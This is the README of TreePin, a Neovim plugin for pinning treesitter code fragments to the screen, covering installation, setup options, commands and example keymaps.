- [React Total Typescript](https://www.totaltypescript.com/tutorials/react-with-typescript)
- [Discriminated Unions are a Frontend Dev's Best Friend](https://www.totaltypescript.com/discriminated-unions-are-a-devs-best-friend)
- [Other React TypeScript Cheatsheets](https://react-typescript-cheatsheet.netlify.app/)
172
8
KaitlynEthylia/TreePin
https://github.com/KaitlynEthylia/TreePin
A lightweight neovim plugin for pinning fragments of code to the screen.
# TreePin

A lightweight neovim plugin for pinning fragments of code to the screen.

## Install

### Lazy

```lua
{
  'KaitlynEthylia/TreePin',
  dependencies = 'nvim-treesitter/nvim-treesitter',
  init = function() require('treepin').setup() end,
}
```

### Packer

```lua
use {
  'KaitlynEthylia/TreePin',
  requires = {'nvim-treesitter/nvim-treesitter'},
  config = function() require('treepin').setup() end,
}
```

### Plug

```vim
Plug 'nvim-treesitter/nvim-treesitter'
Plug 'KaitlynEthylia/TreePin'
```

## Demo

[Temporarily unavailable because technology is difficult; alternatively, it can be viewed on [imgur](https://i.imgur.com/aLNgm5D.mp4).]

## Setup

TreePin will do nothing until the setup function is called. The setup function may be called with no arguments or with a table of configuration options; the default configuration is shown below.

```lua
require('treepin').setup {
  hide_onscreen = true, -- Hides the pin buffer when the text of the pin is visible.
  max_height = 30, -- Prevents the pin buffer from displaying when the pin is taller than this many lines.
  position = 'relative', -- May be 'relative', 'top', or 'bottom'. Determines the position of the pin buffer within the window.
  icon = '>', -- The icon to display in the sign column at the top of the pin. Set to nil to prevent the sign column being used.
  zindex = 50, -- The Z-index of the pin buffer.
  separator = nil, -- A single character that may be used as a separator between the editing buffer and the pin buffer.
}
```

## Commands

| Command | Lua Function | Description |
| ------- | ------------ | ----------- |
| TPPin | `treepin.pinLocal()` | Sets the window's pin at the treesitter node under the cursor. |
| TPRoot | `treepin.pinRoot()` | Sets the window's pin at the second-largest treesitter node under the cursor (the largest is the file itself). |
| TPGrow | `treepin.pinGrow()` | Expands the pin to the next parent treesitter node that sits on a different line. |
| TPShrink | `treepin.pinShrink()` | Reverses the effect of growing the pin. The pin cannot be shrunk smaller than the node under the cursor when the pin was created. |
| TPClear | `treepin.pinClear()` | Removes the pin buffer and the pin itself. |
| TPGo | `treepin.pinGo()` | Jumps to the first line of the pin. |
| TPShow | `treepin.pinShow()` | Called automatically when a pin is created. Enables displaying the pin buffer. |
| TPHide | `treepin.pinHide()` | Hides the pin buffer but keeps the pin stored. |
| TPToggle | `treepin.pinToggle()` | Runs either pinHide or pinShow depending on whether the pin is visible. |

Although there is no user command for it, the `treepin.pin(winnr, base, grow, bufnr)` function is also available for anyone who wants to create an arbitrary pin from a script. The arguments are detailed in doc comments.

Keybindings are left to the user to set themselves; see the example mappings at the end of this README.

## Future

Several features have already been considered for future versions, particularly:

- More scripting utilities in order to integrate with other tools better.
- The ability to save pin history and jump between pins. If this is implemented, it may become its own plugin.
- The ability to move the pin to adjacent treesitter nodes.

### Note

These are not promises. The first one is very likely to happen, however, as it alone could introduce the ability for external code to implement the others.

## Contributing

All contributions are welcome! Just follow common-sense etiquette and we can create something that works.
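## Example Keymaps

The plugin does not define any mappings itself. As a purely illustrative sketch (the key choices are arbitrary), the Lua functions from the Commands table above can be bound like this:

```lua
local treepin = require('treepin')

vim.keymap.set('n', '<leader>pp', treepin.pinLocal,  { desc = 'TreePin: pin node under cursor' })
vim.keymap.set('n', '<leader>pr', treepin.pinRoot,   { desc = 'TreePin: pin root-level node' })
vim.keymap.set('n', '<leader>pg', treepin.pinGrow,   { desc = 'TreePin: grow pin' })
vim.keymap.set('n', '<leader>ps', treepin.pinShrink, { desc = 'TreePin: shrink pin' })
vim.keymap.set('n', '<leader>px', treepin.pinClear,  { desc = 'TreePin: clear pin' })
vim.keymap.set('n', '<leader>pt', treepin.pinToggle, { desc = 'TreePin: toggle pin display' })
```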
26
1